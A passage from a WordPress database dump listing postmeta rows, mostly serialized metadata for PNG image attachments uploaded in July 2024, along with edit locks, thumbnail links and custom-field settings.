(470,179,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/12-2566.png\";s:8:\"filesize\";i:1269014;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"12-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112997;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"12-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:945689;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"12-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47150;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"12-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1039656;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"12-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114505;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(471,180,'_wp_attached_file','2024/07/13-2566.png'),
(472,180,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/13-2566.png\";s:8:\"filesize\";i:1205966;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"13-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119135;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"13-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:969591;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"13-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49831;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"13-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1069733;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"13-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:134764;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(473,181,'_wp_attached_file','2024/07/14-2566.png'),
(474,181,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/14-2566.png\";s:8:\"filesize\";i:1136306;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"14-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:111879;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"14-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:874227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"14-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41797;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"14-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:957101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"14-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91618;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(475,182,'_wp_attached_file','2024/07/15-2566.png'),
(476,182,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/15-2566.png\";s:8:\"filesize\";i:962256;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"15-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98699;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"15-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:830701;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"15-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38871;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"15-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:917354;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"15-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101619;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(477,183,'_wp_attached_file','2024/07/16-2566.png'),
(478,183,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/16-2566.png\";s:8:\"filesize\";i:1064091;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"16-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110112;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"16-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:912982;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"16-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:39579;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"16-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1005797;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"16-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84144;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(479,184,'_wp_attached_file','2024/07/17-2566.png'),
(480,184,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/17-2566.png\";s:8:\"filesize\";i:1325392;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"17-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124407;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"17-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1021955;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"17-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51720;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"17-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1127612;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"17-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:137796;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(494,186,'title_style','default'),
(495,186,'_title_style','field_5d1a0217cf408'),
(499,187,'_edit_lock','1722094677:1'),
(500,188,'title_style','default'),
(501,188,'_title_style','field_5d1a0217cf408'),
(502,189,'_wp_attached_file','2024/07/1-2566-2.png'),
(503,189,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/1-2566-2.png\";s:8:\"filesize\";i:1252356;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"1-2566-2-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115311;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"1-2566-2-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:928087;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"1-2566-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47153;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"1-2566-2-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1023793;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"1-2566-2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131036;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(505,187,'_thumbnail_id','189'),
(506,187,'_edit_last','1'),
(507,187,'title_style','default'),
(508,187,'_title_style','field_5d1a0217cf408'),
(509,187,'related',''),
(510,187,'_related','field_603b51c3e183e'),
(511,190,'title_style','default'),
(512,190,'_title_style','field_5d1a0217cf408'),
(513,190,'related',''),
(514,190,'_related','field_603b51c3e183e'),
(515,191,'_edit_lock','1722094717:1'),
(516,192,'_wp_attached_file','2024/07/2-2566-1.png'),
(517,192,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/2-2566-1.png\";s:8:\"filesize\";i:1223222;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"2-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115796;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"2-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:911086;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"2-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"2-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1002335;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"2-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124424;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(519,191,'_thumbnail_id','192'),
(520,191,'_edit_last','1'),
(522,191,'title_style','default'),
(523,191,'_title_style','field_5d1a0217cf408'),
(524,191,'related',''),
(525,191,'_related','field_603b51c3e183e'),
(526,193,'title_style','default'),
(527,193,'_title_style','field_5d1a0217cf408'),
(528,193,'related',''),
(529,193,'_related','field_603b51c3e183e'),
(530,194,'_edit_lock','1722094748:1'),
(531,195,'_wp_attached_file','2024/07/3-1-2566-1.png'),
(532,195,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:22:\"2024/07/3-1-2566-1.png\";s:8:\"filesize\";i:1375212;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"3-1-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114967;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"3-1-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:948900;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"3-1-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47284;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"3-1-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1045170;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"3-1-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107303;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(534,194,'_thumbnail_id','195'),
(535,194,'_edit_last','1'),
(536,194,'title_style','default'),
(537,194,'_title_style','field_5d1a0217cf408'),
(538,194,'related',''),
(539,194,'_related','field_603b51c3e183e'),
(540,196,'title_style','default'),
(541,196,'_title_style','field_5d1a0217cf408'),
(542,196,'related',''),
(543,196,'_related','field_603b51c3e183e'),
(544,197,'_edit_lock','1722094792:1'),
(545,198,'_wp_attached_file','2024/07/3-2-2566-1.png'),
(546,198,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:22:\"2024/07/3-2-2566-1.png\";s:8:\"filesize\";i:1444105;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"3-2-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120737;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"3-2-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:972982;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"3-2-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50794;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"3-2-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1072077;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"3-2-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128683;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(548,197,'_thumbnail_id','198'),
(549,197,'_edit_last','1'),
(550,197,'title_style','default'),
(551,197,'_title_style','field_5d1a0217cf408'),
(552,197,'related',''),
(553,197,'_related','field_603b51c3e183e'),
(554,199,'title_style','default'),
(555,199,'_title_style','field_5d1a0217cf408'),
(556,199,'related',''),
(557,199,'_related','field_603b51c3e183e'),
(558,200,'_edit_lock','1722094829:1'),
(559,201,'_wp_attached_file','2024/07/4-2566-1.png'),
(560,201,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/4-2566-1.png\";s:8:\"filesize\";i:1262171;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"4-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117342;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"4-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:967718;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"4-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"4-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1066804;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"4-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(562,200,'_thumbnail_id','201'),
(563,200,'_edit_last','1'),
(565,200,'title_style','default'),
(566,200,'_title_style','field_5d1a0217cf408'),
(567,200,'related',''),
(568,200,'_related','field_603b51c3e183e'),
(569,202,'title_style','default'),
(570,202,'_title_style','field_5d1a0217cf408'),
(571,202,'related',''),
(572,202,'_related','field_603b51c3e183e'),
(573,203,'_edit_lock','1722182815:1'),
(574,204,'_wp_attached_file','2024/07/5-2566-1.png'),
(575,204,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/5-2566-1.png\";s:8:\"filesize\";i:1521476;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"5-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126701;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"5-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1108933;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"5-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47403;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"5-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1225101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"5-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125341;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(577,203,'_thumbnail_id','204'),
(578,203,'_edit_last','1'),
(580,203,'title_style','default'),
(581,203,'_title_style','field_5d1a0217cf408'),
(582,203,'related',''),
(583,203,'_related','field_603b51c3e183e'),
(584,205,'title_style','default'),
(585,205,'_title_style','field_5d1a0217cf408'),
(586,205,'related',''),
(587,205,'_related','field_603b51c3e183e'),
(588,206,'_edit_lock','1722182982:1'),
(589,207,'_wp_attached_file','2024/07/6-2566-1.png'),
(590,207,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/6-2566-1.png\";s:8:\"filesize\";i:1446163;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"6-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117629;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"6-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1066279;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"6-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44657;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"6-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1179916;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"6-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117435;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(592,206,'_thumbnail_id','207'),
(593,206,'_edit_last','1'),
(595,206,'title_style','default'),
(596,206,'_title_style','field_5d1a0217cf408'),
(597,208,'title_style','default'),
(598,208,'_title_style','field_5d1a0217cf408'),
(599,209,'_edit_lock','1722094990:1'),
(600,210,'_wp_attached_file','2024/07/7-2566-1.png'),
(601,210,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/7-2566-1.png\";s:8:\"filesize\";i:1268562;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"7-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116764;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"7-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:963194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"7-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46916;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"7-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1062261;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"7-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132995;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(603,209,'_thumbnail_id','210'),
(604,209,'_edit_last','1'),
(606,209,'title_style','default'),
(607,209,'_title_style','field_5d1a0217cf408'),
(608,209,'related',''),
(609,209,'_related','field_603b51c3e183e'),
(610,211,'title_style','default'),
(611,211,'_title_style','field_5d1a0217cf408'),
